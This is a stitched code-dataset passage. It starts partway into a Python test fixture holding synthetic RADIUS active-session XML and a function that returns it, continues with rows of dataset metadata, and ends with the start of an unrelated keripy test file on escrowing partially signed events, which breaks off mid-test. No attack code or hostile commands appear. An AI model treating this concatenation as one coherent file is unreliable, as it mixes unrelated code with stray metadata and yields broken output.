cct_session_id>0000005B</acct_session_id><server>web</server><framed_ip_address>10.0.1.13</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:DC:8B:D9</user_name><calling_station_id>00:11:BB:DC:8B:D9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000029</acct_session_id><server>web</
server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:8B:16:7C</user_name><calling_station_id>00:11:BB:8B:16:7C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000C</acct_session_id><server>web</server><framed_ip_address>10.0.1.130</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:4F:E9:53</user_name><calling_station_id>00:00:AA:4F:E9:53</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000005D</acct_session_id><server>web</server><framed_ip_address>10.0.1.49</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:39:D8:41</user_name><calling_station_id>00:11:BB:39:D8:41</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000060</acct_session_id><server>web</server><framed_ip_address>10.0.1.6</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:0C:CE:D3</user_name><calling_station_id>00:00:AA:0C:CE:D3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000018</acct_session_id><server>web</server><framed_ip_address>10.0.1.96</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:ED:BE:DA</user_name><calling_station_id>00:11:BB:ED:BE:DA</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000086</acct_session_id><server>web</server><framed_ip_address>10.0.1.7</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:B6:52:06</user_name><calling_station_id>00:11:BB:B6:52:06</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000058</acct_session_id><server>web</server><framed_ip_address>10.0.1.63</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:3C:FD:7F</user_name>
<calling_station_id>00:11:BB:3C:FD:7F</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001D</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:F6:2E:9A</user_name><calling_station_id>00:00:AA:F6:2E:9A</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000031</acct_session_id><server>web</server><framed_ip_address>10.0.1.43</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:DD:DD:5C</user_name><calling_station_id>00:11:BB:DD:DD:5C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000023</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:1A:5F:68</user_name><calling_station_id>00:11:BB:1A:5F:68</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000110</acct_session_id><server>web</server><framed_ip_address>10.0.1.16</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:D3:22:6D</user_name><calling_station_id>00:11:BB:D3:22:6D</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000000E</acct_session_id><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:1A:DB:DE</user_name><calling_station_id>00:11:BB:1A:DB:DE</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000025</acct_session_id><server>web</server><framed_ip_address>10.0.1.111</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:94:43:3B</user_name><calling_station_id>00:00:AA:94:43:3B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003B</acct_session_
id><server>web</server><framed_ip_address>10.0.1.61</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:2D:81:D7</user_name><calling_station_id>00:11:BB:2D:81:D7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000062</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:62:49:FC</user_name><calling_station_id>00:11:BB:62:49:FC</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000C5</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:14:6A:B5</user_name><calling_station_id>00:00:AA:14:6A:B5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000052</acct_session_id><server>web</server><framed_ip_address>10.0.1.5</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:98:31:A5</user_name><calling_station_id>00:11:BB:98:31:A5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000005A</acct_session_id><server>web</server><framed_ip_address>10.0.1.96</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:D8:FC:9C</user_name><calling_station_id>00:11:BB:D8:FC:9C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000020</acct_session_id><server>web</server><framed_ip_address>10.0.1.19</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:A9:AC:74</user_name><calling_station_id>00:11:BB:A9:AC:74</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000034</acct_session_id><server>web</server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:5C:68
:50</user_name><calling_station_id>00:11:BB:5C:68:50</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004C</acct_session_id><server>web</server><framed_ip_address>10.0.1.13</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C6:7A:16</user_name><calling_station_id>00:11:BB:C6:7A:16</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000033</acct_session_id><server>web</server><framed_ip_address>10.0.1.86</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:7A:BD:9D</user_name><calling_station_id>00:11:BB:7A:BD:9D</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000077</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:6D:5D:5C</user_name><calling_station_id>00:11:BB:6D:5D:5C</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004D</acct_session_id><server>web</server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:83:2C:52</user_name><calling_station_id>00:11:BB:83:2C:52</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000042</acct_session_id><server>web</server><framed_ip_address>10.0.1.55</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:E1:99:4A</user_name><calling_station_id>00:11:BB:E1:99:4A</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000014</acct_session_id><server>web</server><framed_ip_address>10.0.1.24</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:96:67:A2</user_name><calling_station_id>00:11:BB:96:67:A2</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000105</
acct_session_id><server>web</server><framed_ip_address>10.0.1.31</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:4B:68:3D</user_name><calling_station_id>00:00:AA:4B:68:3D</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000A1</acct_session_id><server>web</server><framed_ip_address>10.0.1.17</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:A3:54:0B</user_name><calling_station_id>00:11:BB:A3:54:0B</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000006D</acct_session_id><server>web</server><framed_ip_address>10.0.1.9</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:03:82:84</user_name><calling_station_id>00:11:BB:03:82:84</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000D2</acct_session_id><server>web</server><framed_ip_address>10.0.1.21</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:1D:E1:79</user_name><calling_station_id>00:11:BB:1D:E1:79</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000061</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C1:41:46</user_name><calling_station_id>00:11:BB:C1:41:46</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000F3</acct_session_id><server>web</server><framed_ip_address>10.0.1.17</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:9E:22:FC</user_name><calling_station_id>00:11:BB:9E:22:FC</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000070</acct_session_id><server>web</server><framed_ip_address>10.0.1.11</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>
48:03:62:00:00:00</user_name><calling_station_id>48:03:62:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000051</acct_session_id><server>web</server><framed_ip_address>10.0.1.21</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:89:41:52</user_name><calling_station_id>00:11:BB:89:41:52</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000006B</acct_session_id><server>web</server><framed_ip_address>10.0.1.7</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:94:91:BF</user_name><calling_station_id>00:00:AA:94:91:BF</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000124</acct_session_id><server>web</server><framed_ip_address>10.0.1.24</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:20:7C:39</user_name><calling_station_id>00:11:BB:20:7C:39</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000008E</acct_session_id><server>web</server><framed_ip_address>10.0.1.15</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:00:AA:FA:21:E5</user_name><calling_station_id>00:00:AA:FA:21:E5</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000045</acct_session_id><server>web</server><framed_ip_address>10.0.1.14</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:C8:94:F7</user_name><calling_station_id>00:11:BB:C8:94:F7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000007F</acct_session_id><server>web</server><framed_ip_address>10.0.1.92</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:D3:85:FD</user_name><calling_station_id>00:11:BB:D3:85:FD</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session
_id>00000009</acct_session_id><server>web</server><framed_ip_address>10.0.1.28</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:61:7E:E4</user_name><calling_station_id>00:11:BB:61:7E:E4</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000071</acct_session_id><server>web</server><framed_ip_address>10.0.1.16</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:F1:FF:10</user_name><calling_station_id>00:11:BB:F1:FF:10</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000BB</acct_session_id><server>web</server><framed_ip_address>10.0.1.81</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:7F:F3:B0</user_name><calling_station_id>00:11:BB:7F:F3:B0</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000002B</acct_session_id><server>web</server><framed_ip_address>10.0.1.58</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:7C:A7:D9</user_name><calling_station_id>00:11:BB:7C:A7:D9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000126</acct_session_id><server>web</server><framed_ip_address>10.0.1.77</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>A4:A4:D3:00:00:00</user_name><calling_station_id>A4:A4:D3:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000066</acct_session_id><server>web</server><framed_ip_address>10.0.1.23</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:75:CC:82</user_name><calling_station_id>00:11:BB:75:CC:82</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000040</acct_session_id><server>web</server><framed_ip_address>10.0.1.11</framed_ip_address><framed_ipv6_address/></activeSession><activeSes
sion><user_name>00:11:BB:84:2C:E3</user_name><calling_station_id>00:11:BB:84:2C:E3</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000037</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:31:DD:94</user_name><calling_station_id>00:11:BB:31:DD:94</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000021</acct_session_id><server>web</server><framed_ip_address>10.0.1.20</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>10:1B:54:00:00:00</user_name><calling_station_id>10:1B:54:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000006C</acct_session_id><server>web</server><framed_ip_address>10.0.1.17</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>1C:98:EC:00:00:00</user_name><calling_station_id>1C:98:EC:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000053</acct_session_id><server>web</server><framed_ip_address>10.0.1.12</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:FE:74:46</user_name><calling_station_id>00:11:BB:FE:74:46</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>000000CB</acct_session_id><server>web</server><framed_ip_address>10.0.1.130</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:FB:32:BA</user_name><calling_station_id>00:11:BB:FB:32:BA</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003E</acct_session_id><server>web</server><framed_ip_address>10.0.1.42</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:EE:0A:C0</user_name><calling_station_id>00:11:BB:EE:0A:C0</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_add
ress><acct_session_id>000000C3</acct_session_id><server>web</server><framed_ip_address>10.0.1.57</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:11:BB:20:F2:86</user_name><calling_station_id>00:11:BB:20:F2:86</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000017</acct_session_id><server>web</server><framed_ip_address>10.0.1.52</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>F0:5F:5A:00:00:00</user_name><calling_station_id>F0:5F:5A:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000004B</acct_session_id><server>web</server><framed_ip_address>10.0.1.11</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:21:15:00:00:00</user_name><calling_station_id>00:21:15:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000003F</acct_session_id><server>web</server><framed_ip_address>10.0.1.90</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>78:EC:74:00:00:00</user_name><calling_station_id>78:EC:74:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000003</acct_session_id><server>web</server><framed_ip_address>10.0.1.45</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>DC:E2:AC:00:00:00</user_name><calling_station_id>DC:E2:AC:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000047</acct_session_id><server>web</server><framed_ip_address>10.0.1.69</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>70:CD:60:00:00:00</user_name><calling_station_id>70:CD:60:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000048</acct_session_id><server>web</server><framed_ip_address>10.0.1.68</framed_ip_address><framed_ipv6_address/></active
Session><activeSession><user_name>00:1A:C5:00:00:00</user_name><calling_station_id>00:1A:C5:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001B</acct_session_id><server>web</server><framed_ip_address>10.0.1.43</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:D0:D2:00:00:00</user_name><calling_station_id>00:D0:D2:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>0000001A</acct_session_id><server>web</server><framed_ip_address>10.0.1.100</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:17:59:00:00:00</user_name><calling_station_id>00:17:59:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000046</acct_session_id><server>web</server><framed_ip_address>10.0.1.10</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest3756</user_name><calling_station_id>E5:40:0F:B5:13:03</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000063</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>00:13:96:00:00:00</user_name><calling_station_id>00:13:96:00:00:00</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000059</acct_session_id><server>web</server><framed_ip_address>10.0.1.95</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest6378</user_name><calling_station_id>DD:23:19:09:2B:E9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000075</acct_session_id><server>web</server><framed_ip_address>10.0.1.46</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest8989</user_name><calling_station_id>F3:55:96:25:64:29</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><a
cct_session_id>00000068</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest4623</user_name><calling_station_id>E5:70:0A:12:2B:B7</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000041</acct_session_id><server>web</server><framed_ip_address>10.0.1.3</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest9247</user_name><calling_station_id>C2:13:1A:88:DD:90</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000030</acct_session_id><server>web</server><framed_ip_address>10.0.1.39</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest3337</user_name><calling_station_id>DF:10:8B:F6:F0:B1</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000011</acct_session_id><server>web</server><framed_ip_address>10.0.1.22</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest9255</user_name><calling_station_id>92:EC:CB:3F:C9:E9</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000028</acct_session_id><server>web</server><framed_ip_address>10.0.1.8</framed_ip_address><framed_ipv6_address/></activeSession><activeSession><user_name>guest8989</user_name><calling_station_id>63:C6:05:25:A4:55</calling_station_id><nas_ip_address>198.18.134.139</nas_ip_address><acct_session_id>00000022</acct_session_id><server>web</server><framed_ip_address>10.0.1.12</framed_ip_address><framed_ipv6_address/></activeSession></activeList>
"""
def sample_authlist():
    """
    Return the canned activeList/activeSession XML string fixture.

    The returned value is the module-level ``xmlstr`` triple-quoted string
    defined above, containing sample RADIUS-style active-session entries
    (user_name, calling_station_id, nas_ip_address, acct_session_id, ...).
    """
    return xmlstr
| 8,963.75
| 71,662
| 0.821977
| 13,279
| 71,710
| 4.098426
| 0.034415
| 0.162064
| 0.144057
| 0.099039
| 0.972126
| 0.970362
| 0.929772
| 0.929037
| 0.862889
| 0.79946
| 0
| 0.131033
| 0.000251
| 71,710
| 7
| 71,663
| 10,244.285714
| 0.62809
| 0
| 1
| 0
| 0
| 0.25
| 0.999205
| 0.998661
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 15
|
c51b4b64025985b29616205dfa344fe1e16200a2
| 61,938
|
py
|
Python
|
tests/core/test_escrow.py
|
KodexData/keripy
|
2a6b7883fcb04c29b4ce8f55ebb5d2eb36e24689
|
[
"Apache-2.0"
] | 26
|
2020-05-18T19:52:33.000Z
|
2022-03-02T13:58:45.000Z
|
tests/core/test_escrow.py
|
KodexData/keripy
|
2a6b7883fcb04c29b4ce8f55ebb5d2eb36e24689
|
[
"Apache-2.0"
] | 16
|
2020-08-26T12:53:37.000Z
|
2021-05-26T15:29:19.000Z
|
tests/core/test_escrow.py
|
m00sey/keripy
|
7bdaf57972d44c2435726bd2300b01a1a90a83b2
|
[
"Apache-2.0"
] | 13
|
2020-05-05T20:21:26.000Z
|
2022-03-31T14:11:30.000Z
|
# -*- encoding: utf-8 -*-
"""
tests escrows in database primarily logic in Kevery and Kever from keri.core.eventing
"""
import os
import time
import datetime
import pytest
from keri import help
from keri.help import helping
from keri.db import dbing, basing
from keri.app import keeping
from keri.core import coring, eventing, parsing
logger = help.ogler.getLogger()
def test_partial_signed_escrow():
    """
    Test partially signed escrow.

    Exercises Kevery's partial-signature escrow (PSE): events that arrive
    with fewer signatures than their (weighted) signing threshold requires
    are escrowed, not accepted.  Verifies that escrow processing is
    idempotent, that events are accepted once enough signatures accumulate,
    that stale escrows (TimeoutPSE == 0) are discarded, and that first-seen
    acceptance timestamps behave correctly across inception, interaction,
    and rotation events.
    """
    salt = coring.Salter(raw=b'0123456789abcdef').qb64  # init wes Salter
    psr = parsing.Parser()
    # init event DB and keep DB
    with basing.openDB(name="edy") as db, keeping.openKS(name="edy") as ks:
        # Init key pair manager
        mgr = keeping.Manager(keeper=ks, salt=salt)
        # Init Kevery with event DB
        kvy = eventing.Kevery(db=db)

        # create inception event with 3 keys each in incept and next sets
        # defaults are algo salty and rooted
        sith = ["1/2", "1/2", "1/2"]  # 2 of 3 but with weighted threshold
        nxtsith = ["1/2", "1/2", "1/2"]
        verfers, digers, cst, nst = mgr.incept(icount=3, isith=sith,
                                               ncount=3, nsith=nxtsith,
                                               stem='wes', temp=True)
        assert cst == nst == sith
        srdr = eventing.incept(keys=[verfer.qb64 for verfer in verfers],
                               sith=sith,
                               nxt=coring.Nexter(sith=nxtsith,
                                                 digs=[diger.qb64 for diger in digers]).qb64,
                               code=coring.MtrDex.Blake3_256)
        pre = srdr.ked["i"]
        mgr.move(old=verfers[0].qb64, new=pre)  # move key pair label to prefix
        sigers = mgr.sign(ser=srdr.raw, verfers=verfers)

        # attach only the first of three signatures: below threshold
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
        msg.extend(counter.qb64b)
        msg.extend(sigers[0].qb64b)
        # apply msg to Kevery to process
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 1
        assert escrows[0] == srdr.digb  # escrow entry for event

        # verify Kevery process is idempotent to previously escrowed events
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 1
        assert escrows[0] == srdr.digb  # escrow entry for event

        # verify Kevery process partials escrow is idempotent to previously escrowed events
        # assuming not stale but nothing else has changed
        kvy.processEscrowPartialSigs()
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 1
        assert escrows[0] == srdr.digb  # escrow entry for event

        # Send message again but with signature from other siger
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
        msg.extend(counter.qb64b)
        msg.extend(sigers[2].qb64b)
        # apply msg to Kevery to process
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        assert pre not in kvy.kevers  # event not accepted
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 1
        assert escrows[0] == srdr.digb  # escrow entry for event
        sigs = kvy.db.getSigs(dbing.dgKey(pre, srdr.dig))  # but sigs is more
        assert len(sigs) == 2

        # get DTS set by escrow date time stamp on event
        edtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))

        # verify Kevery process partials escrow now unescrows correctly given
        # two signatures and assuming not stale
        kvy.processEscrowPartialSigs()
        assert pre in kvy.kevers  # event now accepted via escrow
        kvr = kvy.kevers[pre]  # kever created so event was validated
        assert kvr.prefixer.qb64 == pre
        assert kvr.serder.dig == srdr.dig  # key state updated so event was validated
        # escrows now empty
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 0

        # get DTS set by first seen event acceptance date time stamp
        adtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
        # ensure accept time is later than escrow time, default timedelta is zero
        assert (helping.fromIso8601(adtsb) - helping.fromIso8601(edtsb)) > datetime.timedelta()

        # send duplicate message with all three sigs
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs,
                                 count=len(sigers))
        msg.extend(counter.qb64b)
        for siger in sigers:
            msg.extend(siger.qb64b)
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        sigs = kvy.db.getSigs(dbing.dgKey(pre, srdr.dig))
        assert len(sigs) == 3
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 0  # escrow stays gone
        # get DTS after partial last sig should not change dts from first accepted
        pdtsb = bytes(kvy.db.getDts(dbing.dgKey(pre, srdr.digb)))
        assert pdtsb == adtsb
        # get first seen
        fsdig = kvy.db.getFe(dbing.fnKey(pre, 0))
        assert fsdig == srdr.digb

        # create interaction event for
        srdr = eventing.interact(pre=kvr.prefixer.qb64,
                                 dig=kvr.serder.diger.qb64,
                                 sn=kvr.sn+1,
                                 data=[])
        sigers = mgr.sign(ser=srdr.raw, verfers=kvr.verfers)
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
        msg.extend(counter.qb64b)
        msg.extend(sigers[1].qb64b)
        # apply msg to Kevery to process
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        assert kvr.sn == 0  # key state not updated
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 1
        assert escrows[0] == srdr.digb  # escrow entry for event

        # add another sig
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
        msg.extend(counter.qb64b)
        msg.extend(sigers[0].qb64b)
        # apply msg to Kevery to process
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        assert kvr.sn == 0  # key state not updated
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 1
        assert escrows[0] == srdr.digb  # escrow entry for event
        sigs = kvy.db.getSigs(dbing.dgKey(pre, srdr.dig))  # but sigs is more
        assert len(sigs) == 2

        # Process partials but stale escrow despite two sigs set Timeout to 0
        kvy.TimeoutPSE = 0  # forces all escrows to be stale
        time.sleep(0.001)
        kvy.processEscrowPartialSigs()
        assert kvr.sn == 0  # key state not updated
        # escrows now empty
        escrows = kvy.db.getPses(dbing.snKey(pre, int(srdr.ked["s"], 16)))
        assert len(escrows) == 0

        # Now reset timeout so not zero
        kvy.TimeoutPSE = 3600

        # resend events to load escrow
        msg = bytearray(srdr.raw)
        counter = coring.Counter(code=coring.CtrDex.ControllerIdxSigs)
        msg.extend(counter.qb64b)
        msg.extend(sigers[1].qb64b)
        # apply msg to Kevery to process
        psr.parse(ims=bytearray(msg), kvy=kvy)
        # kvy.process(ims=bytearray(msg))  # process local copy of msg
        assert kvr.sn == 0  # key state not updated
